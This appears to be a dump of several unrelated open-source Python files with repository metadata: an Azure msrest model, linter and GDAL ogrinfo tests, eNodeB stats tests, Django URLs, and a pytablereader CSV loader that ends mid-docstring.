from msrest.serialization import Model
class ParameterGroupingPostRequiredParameters(Model):
"""Additional parameters for post_required operation.
All required parameters must be populated in order to send to Azure.
:param body: Required.
:type body: int
:param custom_header:
:type custom_header: str
:param query: Query parameter with default. Default value: 30 .
:type query: int
:param path: Required. Path parameter
:type path: str
"""
_validation = {
'body': {'required': True},
'path': {'required': True},
}
_attribute_map = {
'body': {'key': '', 'type': 'int'},
'custom_header': {'key': '', 'type': 'str'},
'query': {'key': '', 'type': 'int'},
'path': {'key': '', 'type': 'str'},
}
def __init__(self, *, body: int, path: str, custom_header: str=None, query: int=30, **kwargs) -> None:
super(ParameterGroupingPostRequiredParameters, self).__init__(**kwargs)
self.body = body
self.custom_header = custom_header
self.query = query
self.path = path
| 33.041667
| 106
| 0.580076
|
d09d4f443faa0fb33e47e7e4fe5e8fff220ac10e
| 1,632
|
py
|
Python
|
frosted/test/test_noqa.py
|
magro11/frosted
|
bd05f782d9bee62379b8447dd4dcb2818f7f2142
|
[
"MIT"
] | 59
|
2015-01-05T19:23:58.000Z
|
2018-05-11T09:42:53.000Z
|
frosted/test/test_noqa.py
|
magro11/frosted
|
bd05f782d9bee62379b8447dd4dcb2818f7f2142
|
[
"MIT"
] | 5
|
2015-09-15T03:57:22.000Z
|
2017-12-27T16:17:53.000Z
|
frosted/test/test_noqa.py
|
magro11/frosted
|
bd05f782d9bee62379b8447dd4dcb2818f7f2142
|
[
"MIT"
] | 10
|
2015-01-27T10:37:10.000Z
|
2018-03-05T19:10:44.000Z
|
from frosted import messages as m
from frosted.api import _noqa_lines, _re_noqa, check
from frosted.reporter import Reporter
from .utils import LoggingReporter, flakes
def test_regex():
# simple format
assert _re_noqa.search('#noqa')
assert _re_noqa.search('# noqa')
# simple format is strict, must be at start of comment
assert not _re_noqa.search('# foo noqa')
# verbose format (not strict like simple format)
assert _re_noqa.search('#frosted:noqa')
assert _re_noqa.search('# frosted: noqa')
assert _re_noqa.search('# foo frosted: noqa')
def test_checker_ignore_lines():
# ignore same line
flakes('from fu import *', ignore_lines=[1])
# don't ignore different line
flakes('from fu import *', m.ImportStarUsed, ignore_lines=[2])
def test_noqa_lines():
assert _noqa_lines('from fu import bar; bar') == []
assert _noqa_lines('from fu import * # noqa; bar') == [1]
assert _noqa_lines('from fu import * #noqa\nbar\nfoo # frosted: noqa') == [1, 3]
def test_check_integration():
""" make sure all the above logic comes together correctly in the check() function """
output = []
reporter = LoggingReporter(output)
result = check('from fu import *', 'test', reporter, not_ignore_frosted_errors=['E103'])
# errors reported
assert result == 1
assert "unable to detect undefined names" in output.pop(0)[1]
# same test, but with ignore set
output = []
reporter = LoggingReporter(output)
result = check('from fu import * # noqa', 'test', reporter)
# errors reported
assert result == 0
assert len(output) == 0
| 30.222222
| 92
| 0.679534
|
f1bc5abc818df13b291097ac4a0f9080c9e2a5b2
| 4,795
|
py
|
Python
|
tests/stats_manager_tests.py
|
aweimeow/enodebd
|
e1cd20693153e6b85e5d1bf9d21af2501c358601
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
tests/stats_manager_tests.py
|
aweimeow/enodebd
|
e1cd20693153e6b85e5d1bf9d21af2501c358601
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
tests/stats_manager_tests.py
|
aweimeow/enodebd
|
e1cd20693153e6b85e5d1bf9d21af2501c358601
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# SPDX-FileCopyrightText: 2020 The Magma Authors.
# SPDX-FileCopyrightText: 2022 Open Networking Foundation <support@opennetworking.org>
#
# SPDX-License-Identifier: BSD-3-Clause
from unittest import TestCase, mock
from xml.etree import ElementTree
import pkg_resources
from enodebd import metrics
from data_models.data_model_parameters import ParameterName
from devices.device_utils import EnodebDeviceName
from state_machines.enb_acs_manager import StateMachineManager
from stats_manager import StatsManager
from tests.test_utils.config_builder import EnodebConfigBuilder
from tests.test_utils.enb_acs_builder import (
EnodebAcsStateMachineBuilder,
)
class StatsManagerTest(TestCase):
"""
Tests for eNodeB statistics manager
"""
def setUp(self) -> None:
service = EnodebConfigBuilder.get_service_config()
self.enb_acs_manager = StateMachineManager(service)
self.mgr = StatsManager(self.enb_acs_manager)
self.is_clear_stats_called = False
def tearDown(self):
self.mgr = None
def test_check_rf_tx(self):
""" Check that stats are cleared when transmit is disabled on eNB """
handler = EnodebAcsStateMachineBuilder \
.build_acs_state_machine(EnodebDeviceName.BAICELLS)
with mock.patch(
'magma.enodebd.devices.baicells.BaicellsHandler.is_enodeb_connected',
return_value=True,
):
handler.device_cfg.set_parameter(ParameterName.RF_TX_STATUS, True)
handler.device_cfg.set_parameter(
ParameterName.SERIAL_NUMBER,
'123454',
)
with mock.patch(
'magma.enodebd.stats_manager.StatsManager'
'._clear_stats',
) as func:
self.mgr._check_rf_tx_for_handler(handler)
func.assert_not_called()
handler.device_cfg.set_parameter(
ParameterName.RF_TX_STATUS,
False,
)
self.mgr._check_rf_tx_for_handler(handler)
func.assert_any_call()
def test_parse_stats(self):
""" Test that example statistics from eNodeB can be parsed, and metrics
updated """
# Example performance metrics structure, sent by eNodeB
pm_file_example = pkg_resources.resource_string(
__name__,
'pm_file_example.xml',
)
root = ElementTree.fromstring(pm_file_example)
self.mgr._parse_pm_xml('1234', root)
# Check that metrics were correctly populated
# See '<V i="5">123</V>' in pm_file_example
rrc_estab_attempts = metrics.STAT_RRC_ESTAB_ATT.collect()
self.assertEqual(rrc_estab_attempts[0].samples[0][2], 123)
# See '<V i="7">99</V>' in pm_file_example
rrc_estab_successes = metrics.STAT_RRC_ESTAB_SUCC.collect()
self.assertEqual(rrc_estab_successes[0].samples[0][2], 99)
# See '<SV>654</SV>' in pm_file_example
rrc_reestab_att_reconf_fail = \
metrics.STAT_RRC_REESTAB_ATT_RECONF_FAIL.collect()
self.assertEqual(rrc_reestab_att_reconf_fail[0].samples[0][2], 654)
# See '<SV>65537</SV>' in pm_file_example
erab_rel_req_radio_conn_lost = \
metrics.STAT_ERAB_REL_REQ_RADIO_CONN_LOST.collect()
self.assertEqual(erab_rel_req_radio_conn_lost[0].samples[0][2], 65537)
pdcp_user_plane_bytes_ul = \
metrics.STAT_PDCP_USER_PLANE_BYTES_UL.collect()
pdcp_user_plane_bytes_dl = \
metrics.STAT_PDCP_USER_PLANE_BYTES_DL.collect()
self.assertEqual(pdcp_user_plane_bytes_ul[0].samples[0][1], {'enodeb': '1234'})
self.assertEqual(pdcp_user_plane_bytes_dl[0].samples[0][1], {'enodeb': '1234'})
self.assertEqual(pdcp_user_plane_bytes_ul[0].samples[0][2], 1000)
self.assertEqual(pdcp_user_plane_bytes_dl[0].samples[0][2], 500)
def test_clear_stats(self):
"""
Check that stats of PMPM_FILE_TO_METRIC_MAP is cleared successfully
"""
# Example performance metrics structure, sent by eNodeB
pm_file_example = pkg_resources.resource_string(
__name__,
'pm_file_example.xml',
)
root = ElementTree.fromstring(pm_file_example)
self.mgr._parse_pm_xml('1234', root)
# Check that metrics were correctly populated
rrc_estab_attempts = metrics.STAT_RRC_ESTAB_ATT.collect()
self.assertEqual(rrc_estab_attempts[0].samples[0][2], 123)
self.mgr._clear_stats()
rrc_estab_attempts = metrics.STAT_RRC_ESTAB_ATT.collect()
# After clearing stats collection of metric should report 0
self.assertEqual(rrc_estab_attempts[0].samples[0][2], 0)
| 40.294118
| 87
| 0.672576
|
757bf5846bd3969b78e5d71845cb2f69cb379c42
| 588
|
py
|
Python
|
OpenAPI/api/tools/prestarter.py
|
eleldar/Translator
|
33e41e545d63c2319cdf74284230f6ca70a3e9e7
|
[
"MIT"
] | null | null | null |
OpenAPI/api/tools/prestarter.py
|
eleldar/Translator
|
33e41e545d63c2319cdf74284230f6ca70a3e9e7
|
[
"MIT"
] | null | null | null |
OpenAPI/api/tools/prestarter.py
|
eleldar/Translator
|
33e41e545d63c2319cdf74284230f6ca70a3e9e7
|
[
"MIT"
] | null | null | null |
import os
from pathlib import Path
import codecs
drive, path_and_file = os.path.splitdrive(Path(__file__).absolute())
path, _ = os.path.split(path_and_file)
curdir = os.path.join(drive, path)
files_path = os.path.join(curdir, 'prestart_examples')
def examples(direct):
language_id = direct.split('-')[0]
file = os.path.join(files_path, f'input.{language_id}')
try:
with codecs.open(file, "r", "utf_8_sig") as f:
text = f.readlines()
except FileNotFoundError:
text = []
return text
if __name__ == '__main__':
print(examples('en-ru'))
| 26.727273
| 68
| 0.668367
|
f55e63940184a65bde15d4ff755e62803206043f
| 18,539
|
py
|
Python
|
autotest/utilities/test_ogrinfo.py
|
chambbj/gdal
|
3d56aecb5b8e9890dae8f560acd099992e707d12
|
[
"MIT"
] | null | null | null |
autotest/utilities/test_ogrinfo.py
|
chambbj/gdal
|
3d56aecb5b8e9890dae8f560acd099992e707d12
|
[
"MIT"
] | null | null | null |
autotest/utilities/test_ogrinfo.py
|
chambbj/gdal
|
3d56aecb5b8e9890dae8f560acd099992e707d12
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: ogrinfo testing
# Author: Even Rouault <even dot rouault @ mines-paris dot org>
#
###############################################################################
# Copyright (c) 2008, Even Rouault <even dot rouault @ mines-paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import sys
import os
sys.path.append( '../pymod' )
from osgeo import gdal
import gdaltest
import ogrtest
import test_cli_utilities
###############################################################################
# Simple test
def test_ogrinfo_1():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
(ret, err) = gdaltest.runexternal_out_and_err(test_cli_utilities.get_ogrinfo_path() + ' ../ogr/data/poly.shp')
if not (err is None or err == '') :
gdaltest.post_reason('got error/warning')
print(err)
return 'fail'
if ret.find('ESRI Shapefile') == -1:
return 'fail'
return 'success'
###############################################################################
# Test -ro option
def test_ogrinfo_2():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' -ro ../ogr/data/poly.shp')
if ret.find('ESRI Shapefile') == -1:
return 'fail'
return 'success'
###############################################################################
# Test -al option
def test_ogrinfo_3():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' -al ../ogr/data/poly.shp')
if ret.find('Layer name: poly') == -1:
gdaltest.post_reason('fail')
return 'fail'
if ret.find('Geometry: Polygon') == -1:
gdaltest.post_reason('fail')
return 'fail'
if ret.find('Feature Count: 10') == -1:
gdaltest.post_reason('fail')
return 'fail'
if ret.find('Extent: (478315') == -1:
gdaltest.post_reason('fail')
return 'fail'
if ret.find('PROJCS["OSGB') == -1:
gdaltest.post_reason('fail')
return 'fail'
if ret.find('AREA: Real (') == -1:
gdaltest.post_reason('fail')
return 'fail'
return 'success'
###############################################################################
# Test layer name
def test_ogrinfo_4():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' ../ogr/data/poly.shp poly')
if ret.find('Feature Count: 10') == -1:
return 'fail'
return 'success'
###############################################################################
# Test -sql option
def test_ogrinfo_5():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' ../ogr/data/poly.shp -sql "select * from poly"')
if ret.find('Feature Count: 10') == -1:
return 'fail'
return 'success'
###############################################################################
# Test -geom=NO option
def test_ogrinfo_6():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' ../ogr/data/poly.shp poly -geom=no')
if ret.find('Feature Count: 10') == -1:
return 'fail'
if ret.find('POLYGON') != -1:
return 'fail'
return 'success'
###############################################################################
# Test -geom=SUMMARY option
def test_ogrinfo_7():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' ../ogr/data/poly.shp poly -geom=summary')
if ret.find('Feature Count: 10') == -1:
return 'fail'
if ret.find('POLYGON (') != -1:
return 'fail'
if ret.find('POLYGON :') == -1:
return 'fail'
return 'success'
###############################################################################
# Test -spat option
def test_ogrinfo_8():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' ../ogr/data/poly.shp poly -spat 479609 4764629 479764 4764817')
if ogrtest.have_geos():
if ret.find('Feature Count: 4') == -1:
return 'fail'
return 'success'
else:
if ret.find('Feature Count: 5') == -1:
return 'fail'
return 'success'
###############################################################################
# Test -where option
def test_ogrinfo_9():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' ../ogr/data/poly.shp poly -where "EAS_ID=171"')
if ret.find('Feature Count: 1') == -1:
return 'fail'
return 'success'
###############################################################################
# Test -fid option
def test_ogrinfo_10():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' ../ogr/data/poly.shp poly -fid 9')
if ret.find('OGRFeature(poly):9') == -1:
return 'fail'
return 'success'
###############################################################################
# Test -fields=no option
def test_ogrinfo_11():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' ../ogr/data/poly.shp poly -fields=no')
if ret.find('AREA (Real') != -1:
return 'fail'
if ret.find('POLYGON (') == -1:
return 'fail'
return 'success'
###############################################################################
# Test ogrinfo --version
def test_ogrinfo_12():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' --version', check_memleak = False )
if ret.find(gdal.VersionInfo('--version')) != 0:
print(ret)
return 'fail'
return 'success'
###############################################################################
# Test erroenous use of --config
def test_ogrinfo_13():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
(out, err) = gdaltest.runexternal_out_and_err(test_cli_utilities.get_ogrinfo_path() + ' --config', check_memleak = False )
if err.find('--config option given without a key and value argument') < 0:
print(err)
return 'fail'
return 'success'
###############################################################################
# Test erroenous use of --mempreload
def test_ogrinfo_14():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
(out, err) = gdaltest.runexternal_out_and_err(test_cli_utilities.get_ogrinfo_path() + ' --mempreload', check_memleak = False )
if err.find('--mempreload option given without directory path') < 0:
print(err)
return 'fail'
return 'success'
###############################################################################
# Test --mempreload
def test_ogrinfo_15():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
(ret, err) = gdaltest.runexternal_out_and_err(test_cli_utilities.get_ogrinfo_path() + ' --debug on --mempreload ../ogr/data /vsimem/poly.shp', check_memleak = False )
if ret.find("ESRI Shapefile") < 0:
print(ret)
return 'fail'
return 'success'
###############################################################################
# Test erroenous use of --debug
def test_ogrinfo_16():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
(out, err) = gdaltest.runexternal_out_and_err(test_cli_utilities.get_ogrinfo_path() + ' --debug', check_memleak = False )
if err.find('--debug option given without debug level') < 0:
print(err)
return 'fail'
return 'success'
###############################################################################
# Test erroenous use of --optfile
def test_ogrinfo_17():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
(out, err) = gdaltest.runexternal_out_and_err(test_cli_utilities.get_ogrinfo_path() + ' --optfile', check_memleak = False )
if err.find('--optfile option given without filename') < 0:
gdaltest.post_reason('fail')
print(err)
return 'fail'
(out, err) = gdaltest.runexternal_out_and_err(test_cli_utilities.get_ogrinfo_path() + ' --optfile /foo/bar', check_memleak = False )
if err.find('Unable to open optfile') < 0:
gdaltest.post_reason('fail')
print(err)
return 'fail'
return 'success'
###############################################################################
# Test --optfile
def test_ogrinfo_18():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
f = open('tmp/optfile.txt', 'wt')
f.write('# comment\n')
f.write('../ogr/data/poly.shp\n')
f.close()
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' --optfile tmp/optfile.txt', check_memleak = False )
os.unlink('tmp/optfile.txt')
if ret.find("ESRI Shapefile") < 0:
print(ret)
return 'fail'
return 'success'
###############################################################################
# Test --formats
def test_ogrinfo_19():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' --formats', check_memleak = False )
if ret.find('"ESRI Shapefile" (read/write)') < 0:
print(ret)
return 'fail'
return 'success'
###############################################################################
# Test --help-general
def test_ogrinfo_20():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' --help-general', check_memleak = False )
if ret.find('Generic GDAL/OGR utility command options') < 0:
print(ret)
return 'fail'
return 'success'
###############################################################################
# Test --locale
def test_ogrinfo_21():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' --locale C ../ogr/data/poly.shp', check_memleak = False )
if ret.find("ESRI Shapefile") < 0:
print(ret)
return 'fail'
return 'success'
###############################################################################
# Test RFC 41 support
def test_ogrinfo_22():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
f = open('tmp/test_ogrinfo_22.csv', 'wt')
f.write('_WKTgeom1_EPSG_4326,_WKTgeom2_EPSG_32631\n')
f.write('"POINT(1 2)","POINT(3 4)"\n')
f.close()
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' tmp/test_ogrinfo_22.csv', check_memleak = False )
if ret.find('1: test_ogrinfo_22 (Unknown (any), Unknown (any))') < 0:
print(ret)
return 'fail'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' -al tmp/test_ogrinfo_22.csv', check_memleak = False )
expected_ret = """INFO: Open of `tmp/test_ogrinfo_22.csv'
using driver `CSV' successful.
Layer name: test_ogrinfo_22
Geometry (geom__WKTgeom1_EPSG_4326): Unknown (any)
Geometry (geom__WKTgeom2_EPSG_32631): Unknown (any)
Feature Count: 1
Extent (geom__WKTgeom1_EPSG_4326): (1.000000, 2.000000) - (1.000000, 2.000000)
Extent (geom__WKTgeom2_EPSG_32631): (3.000000, 4.000000) - (3.000000, 4.000000)
SRS WKT (geom__WKTgeom1_EPSG_4326):
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.0174532925199433,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4326"]]
SRS WKT (geom__WKTgeom2_EPSG_32631):
PROJCS["WGS 84 / UTM zone 31N",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.0174532925199433,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4326"]],
PROJECTION["Transverse_Mercator"],
PARAMETER["latitude_of_origin",0],
PARAMETER["central_meridian",3],
PARAMETER["scale_factor",0.9996],
PARAMETER["false_easting",500000],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]],
AXIS["Easting",EAST],
AXIS["Northing",NORTH],
AUTHORITY["EPSG","32631"]]
Geometry Column 1 = geom__WKTgeom1_EPSG_4326
Geometry Column 2 = geom__WKTgeom2_EPSG_32631
_WKTgeom1_EPSG_4326: String (0.0)
_WKTgeom2_EPSG_32631: String (0.0)
OGRFeature(test_ogrinfo_22):1
_WKTgeom1_EPSG_4326 (String) = POINT(1 2)
_WKTgeom2_EPSG_32631 (String) = POINT(3 4)
geom__WKTgeom1_EPSG_4326 = POINT (1 2)
geom__WKTgeom2_EPSG_32631 = POINT (3 4)
"""
expected_lines = expected_ret.splitlines()
lines = ret.splitlines()
for i in range(len(expected_lines)):
if expected_lines[i] != lines[i]:
print(ret)
return 'fail'
os.unlink('tmp/test_ogrinfo_22.csv')
return 'success'
###############################################################################
# Test -geomfield (RFC 41) support
def test_ogrinfo_23():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
f = open('tmp/test_ogrinfo_23.csv', 'wt')
f.write('_WKTgeom1_EPSG_4326,_WKTgeom2_EPSG_32631\n')
f.write('"POINT(1 2)","POINT(3 4)"\n')
f.write('"POINT(3 4)","POINT(1 2)"\n')
f.close()
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' -al tmp/test_ogrinfo_23.csv -spat 1 2 1 2 -geomfield geom__WKTgeom2_EPSG_32631', check_memleak = False )
expected_ret = """INFO: Open of `tmp/test_ogrinfo_23.csv'
using driver `CSV' successful.
Layer name: test_ogrinfo_23
Geometry (geom__WKTgeom1_EPSG_4326): Unknown (any)
Geometry (geom__WKTgeom2_EPSG_32631): Unknown (any)
Feature Count: 1
Extent (geom__WKTgeom1_EPSG_4326): (3.000000, 4.000000) - (3.000000, 4.000000)
Extent (geom__WKTgeom2_EPSG_32631): (1.000000, 2.000000) - (1.000000, 2.000000)
SRS WKT (geom__WKTgeom1_EPSG_4326):
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.0174532925199433,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4326"]]
SRS WKT (geom__WKTgeom2_EPSG_32631):
PROJCS["WGS 84 / UTM zone 31N",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.0174532925199433,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4326"]],
PROJECTION["Transverse_Mercator"],
PARAMETER["latitude_of_origin",0],
PARAMETER["central_meridian",3],
PARAMETER["scale_factor",0.9996],
PARAMETER["false_easting",500000],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]],
AXIS["Easting",EAST],
AXIS["Northing",NORTH],
AUTHORITY["EPSG","32631"]]
Geometry Column 1 = geom__WKTgeom1_EPSG_4326
Geometry Column 2 = geom__WKTgeom2_EPSG_32631
_WKTgeom1_EPSG_4326: String (0.0)
_WKTgeom2_EPSG_32631: String (0.0)
OGRFeature(test_ogrinfo_23):2
_WKTgeom1_EPSG_4326 (String) = POINT(3 4)
_WKTgeom2_EPSG_32631 (String) = POINT(1 2)
geom__WKTgeom1_EPSG_4326 = POINT (3 4)
geom__WKTgeom2_EPSG_32631 = POINT (1 2)
"""
expected_lines = expected_ret.splitlines()
lines = ret.splitlines()
for i in range(len(expected_lines)):
if expected_lines[i] != lines[i]:
print(ret)
return 'fail'
os.unlink('tmp/test_ogrinfo_23.csv')
return 'success'
gdaltest_list = [
test_ogrinfo_1,
test_ogrinfo_2,
test_ogrinfo_3,
test_ogrinfo_4,
test_ogrinfo_5,
test_ogrinfo_6,
test_ogrinfo_7,
test_ogrinfo_8,
test_ogrinfo_9,
test_ogrinfo_10,
test_ogrinfo_11,
test_ogrinfo_12,
test_ogrinfo_13,
test_ogrinfo_14,
test_ogrinfo_15,
test_ogrinfo_16,
test_ogrinfo_17,
test_ogrinfo_18,
test_ogrinfo_19,
test_ogrinfo_20,
test_ogrinfo_21,
test_ogrinfo_22,
test_ogrinfo_23,
]
if __name__ == '__main__':
gdaltest.setup_run( 'test_ogrinfo' )
gdaltest.run_tests( gdaltest_list )
gdaltest.summarize()
| 32.639085
| 177
| 0.587788
|
3b2c805bec1393566901d694bb93b78f8c6fe545
| 394
|
py
|
Python
|
museum_api/urls.py
|
DrDos0016/museum-of-zzt
|
0caa1cbeb2e0ab22206e72bc4ecf4c1b66c25fc4
|
[
"MIT"
] | 2
|
2020-01-05T08:32:51.000Z
|
2021-07-27T06:36:40.000Z
|
museum_api/urls.py
|
DrDos0016/museum-of-zzt
|
0caa1cbeb2e0ab22206e72bc4ecf4c1b66c25fc4
|
[
"MIT"
] | 26
|
2020-02-11T22:10:43.000Z
|
2022-02-03T20:54:08.000Z
|
museum_api/urls.py
|
DrDos0016/museum-of-zzt
|
0caa1cbeb2e0ab22206e72bc4ecf4c1b66c25fc4
|
[
"MIT"
] | null | null | null |
from django.urls import path
import museum_api.endpoints
urlpatterns = [
path("worlds-of-zzt/", museum_api.endpoints.worlds_of_zzt, name="api_wozzt"),
path("v1/get/file/", museum_api.endpoints.get_file, name="api_get_file"),
path("v1/help/", museum_api.endpoints.help, name="api_help"),
path("v1/search/files/", museum_api.endpoints.search_files, name="api_search_files"),
]
| 32.833333
| 89
| 0.733503
|
8774ba3de9d084ca883a12f97c8df3c5a1f9be8a
| 7,083
|
py
|
Python
|
pytablereader/csv/core.py
|
sthagen/thombashi-pytablereader
|
b59859da6fdcc94035933dd253e6e380b04a233b
|
[
"MIT"
] | 81
|
2017-03-18T02:57:29.000Z
|
2022-03-26T16:54:59.000Z
|
pytablereader/csv/core.py
|
sthagen/pytablereader
|
b59859da6fdcc94035933dd253e6e380b04a233b
|
[
"MIT"
] | 4
|
2017-08-09T14:58:48.000Z
|
2020-04-17T12:59:29.000Z
|
pytablereader/csv/core.py
|
sthagen/pytablereader
|
b59859da6fdcc94035933dd253e6e380b04a233b
|
[
"MIT"
] | 11
|
2017-05-02T16:23:59.000Z
|
2021-12-10T15:05:39.000Z
|
"""
.. codeauthor:: Tsuyoshi Hombashi <tsuyoshi.hombashi@gmail.com>
"""
import csv
import io
import warnings
import typepy
from mbstrdecoder import MultiByteStrDecoder
from pytablereader import DataError
from .._common import get_file_encoding
from .._constant import TableNameTemplate as tnt
from .._logger import FileSourceLogger, TextSourceLogger
from .._validator import FileValidator, TextValidator
from ..interface import AbstractTableReader
from .formatter import CsvTableFormatter
class CsvTableLoader(AbstractTableReader):
"""
The abstract class of CSV table loaders.
.. py:attribute:: headers
Attribute names of the table. Use the first line of
the CSV file as attribute list if ``headers`` is empty.
.. py:attribute:: delimiter
A one-character string used to separate fields.
Defaults to ``","``.
.. py:attribute:: quotechar
A one-character string used to quote fields containing
special characters, such as the ``delimiter`` or ``quotechar``,
or which contain new-line characters.
Defaults to ``'"'``.
.. py:attribute:: encoding
Encoding of the CSV data.
"""
@property
def format_name(self):
return "csv"
@property
def delimiter(self):
# "delimiter" must be a string, not an unicode
return str(MultiByteStrDecoder(self.__delimiter).unicode_str)
@delimiter.setter
def delimiter(self, value):
self.__delimiter = value
@property
def quotechar(self):
# "quotechar" must be a string, not an unicode
return str(MultiByteStrDecoder(self.__quotechar).unicode_str)
@quotechar.setter
def quotechar(self, value):
self.__quotechar = value
@property
def header_list(self):
warnings.warn("'header_list' has moved to 'headers'", DeprecationWarning)
return self.headers
@header_list.setter
def header_list(self, value):
warnings.warn("'header_list' has moved to 'headers'", DeprecationWarning)
self.headers = value
def __init__(self, source, quoting_flags, type_hints, type_hint_rules):
super().__init__(source, quoting_flags, type_hints, type_hint_rules)
self._csv_reader = None
self.headers = ()
self.delimiter = ","
self.quotechar = '"'
self.encoding = None
def _to_data_matrix(self):
try:
return [
[self.__modify_item(data, col) for col, data in enumerate(row)]
for row in self._csv_reader
if typepy.is_not_empty_sequence(row)
]
except (csv.Error, UnicodeDecodeError) as e:
raise DataError(e)
def __modify_item(self, data, col: int):
if self.type_hints and (col in self.type_hints):
try:
return self.type_hints[col](data).convert()
except typepy.TypeConversionError:
pass
return MultiByteStrDecoder(data).unicode_str
class CsvTableFileLoader(CsvTableLoader):
"""
A file loader class to extract tabular data from CSV files.
:param str file_path: Path to the loading CSV file.
.. py:attribute:: table_name
Table name string. Defaults to ``%(filename)s``.
:Examples:
:ref:`example-csv-table-loader`
"""
def __init__(self, file_path, quoting_flags=None, type_hints=None, type_hint_rules=None):
super().__init__(file_path, quoting_flags, type_hints, type_hint_rules)
self._validator = FileValidator(file_path)
self._logger = FileSourceLogger(self)
def load(self):
"""
Extract tabular data as |TableData| instances from a CSV file.
|load_source_desc_file|
:return:
Loaded table data.
|load_table_name_desc|
=================== ========================================
Format specifier Value after the replacement
=================== ========================================
``%(filename)s`` |filename_desc|
``%(format_name)s`` ``"csv"``
``%(format_id)s`` |format_id_desc|
``%(global_id)s`` |global_id|
=================== ========================================
